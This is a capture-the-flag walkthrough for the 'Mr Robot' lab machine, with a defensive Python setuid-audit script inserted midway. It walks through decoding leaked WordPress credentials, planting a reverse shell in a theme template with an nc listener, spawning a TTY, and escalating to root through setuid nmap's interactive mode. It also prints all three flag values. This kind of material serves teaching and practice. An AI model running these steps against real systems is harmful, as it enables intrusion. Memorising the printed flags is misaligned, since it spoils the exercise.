From aldeid

Mr Robot CTF


Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

Credit to Leon Johnson for creating this machine.

#1 - What is key 1?

Hint: Robots

Let’s get started with an Nmap scan. It reveals 3 ports, 2 of which are open (http and https); SSH is closed.

22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject:
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Let’s start with the web server. Following the hint, let’s fetch the robots.txt file. It discloses 2 hidden files, one of which is key 1.

$ curl -s
User-agent: *
$ curl -s

The second file is a dictionary (wordlist) that we will probably need for discovering other locations.

$ head fsocity.dic 

Key1: 073403c8a58a1f80d943455fb30724b9

#2 - What is key 2?

Hint: White coloured font

gobuster discovers several locations, including:

  • /login (Status: 302)
  • /wp-content (Status: 301)
  • /admin (Status: 301)
  • /wp-login (Status: 200)
  • /license (Status: 200)
  • /wp-includes (Status: 301)

WordPress is installed. Moreover, the /license location discloses credentials:

$ curl -s | tr -d "\n"
what you do just pull code from Rapid9 or some [email protected]#% since when did you become a script kitty?do you want a password or something?ZWxsaW90OkVSMjgtMDY1Mgo=

$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
elliot:ER28-0652

Let’s try these credentials against WordPress. They work and we are logged in as administrator! Several points to note here:

  • The WordPress version is 4.3.1. Considering the current version is 5.4.1, we are likely to find vulnerabilities.
  • There are 2 users:

    Username    Name             Profile
    elliot      Elliot Alderson  Administrator
    mich05654   Krista Gordon    Subscriber

Since we are administrator, we can modify the theme templates. Go to Appearance > Editor, open the first template (404.php) and replace its PHP code with a reverse shell taken from here, making sure to set your local IP.

Now open a listener:

$ nc -nlvp 1234

And visit to open the reverse shell.

We see our next key in /home/robot but it is only readable by the robot user.

$ ls -l /home/robot/
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
$ whoami

We are also given the MD5 hash of the robot user’s password:

$ cat password.raw-md5
cat password.raw-md5

This hash is listed here; the associated password is abcdefghijklmnopqrstuvwxyz. Let’s try to log in as robot.

$ su - robot
su: must be run from a terminal

Not a problem: let’s spawn a proper TTY with Python (after first confirming it is installed):

$ which python
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
$ cat key-2-of-3.txt
cat key-2-of-3.txt

#3 - What is key 3?

Hint: nmap

Our last key is very likely in the /root directory, and we will need a privilege escalation to access it.

The nmap scan showed that port 22 (ssh) is closed, probably because the service is not running, so we will need to elevate our privileges from the shell we already have.

Unfortunately, the robot user is not in the sudoers file:

$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz

Sorry, user robot may not run sudo on linux.

OK, let’s list the root-owned programs that have the SETUID bit set:

$ find / -user root -perm -4000 -print 2>/dev/null

Interestingly, nmap is on the list (it’s also the hint, by the way). Besides, it’s a very old release (3.81), considering that the current release is 7.80 at the time of this writing.

$ which nmap
which nmap
$ nmap --version
nmap --version

nmap version 3.81 ( )

As described here, older nmap releases (2.02 to 5.21) had an interactive mode that allows executing shell commands.

Since nmap has the SETUID bit set and is owned by root, those commands will run as root:

$ ls -l /usr/local/bin/nmap
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
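From the defender’s side, this is exactly the kind of finding a periodic setuid audit catches: a root-owned setuid binary that is not part of the known-good baseline and sits in /usr/local/bin. The following Python script is an added example, not code from the original writeup; its BASELINE set and UNUSUAL_PREFIXES tuple are assumed, illustrative values, and SAMPLE_ENTRIES is a constructed scan result mirroring the box.

```python
import os
import stat
# Assumed baseline of setuid-root programs expected on this host (illustrative;
# on a real system, record it from a known-good build of the same image).
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su"}
# Distribution packages do not normally install setuid binaries under these
# prefixes, so a setuid-root file there is suspicious even if it is baselined.
UNUSUAL_PREFIXES = ("/usr/local/", "/opt/", "/tmp/", "/var/tmp/", "/home/")

def is_setuid_root(mode, uid):
    """True for a regular file owned by uid 0 with the setuid bit set."""
    return stat.S_ISREG(mode) and uid == 0 and bool(mode & stat.S_ISUID)

def classify(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode, st_uid), e.g. from scan(). Reports
    setuid-root files outside the baseline, those in unusual locations, and
    baseline entries that have lost the bit or disappeared."""
    found = {path for path, mode, uid in entries if is_setuid_root(mode, uid)}
    return {
        "unexpected": sorted(found - set(baseline)),
        "unusual_location": sorted(p for p in found if p.startswith(UNUSUAL_PREFIXES)),
        "missing": sorted(set(baseline) - found),
    }

def scan(root="/"):
    """Yield (path, mode, uid) for every file, skipping pseudo filesystems."""
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(("/proc", "/sys", "/dev", "/run")):
            dirnames[:] = []  # do not descend into kernel/runtime trees
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink itself is never setuid
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid

def file_mode(perm):
    """Build a regular-file st_mode from octal permissions, e.g. 0o4755."""
    return stat.S_IFREG | perm

# Constructed sample scan mirroring the box: nmap is setuid root in /usr/local/bin.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", file_mode(0o4755), 0),
    ("/usr/bin/sudo", file_mode(0o4755), 0),
    ("/bin/su", file_mode(0o4755), 0),
    ("/usr/local/bin/nmap", file_mode(0o4755), 0),  # the writeup's finding
    ("/usr/bin/python", file_mode(0o755), 0),       # root-owned, not setuid
    ("/home/robot/tool", file_mode(0o4755), 1000),  # setuid, not root-owned
]
```

Run `classify(scan())` as root on the host being audited; `classify(SAMPLE_ENTRIES)` reproduces the writeup’s finding offline, reporting /usr/local/bin/nmap as both unexpected and in an unusual location.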

Let’s start nmap in interactive mode:

$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done  key-3-of-3.txt
waiting to reap child : No child processes
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
waiting to reap child : No child processes

Key3: 04787ddef27c3dee1ee161b21670b4e4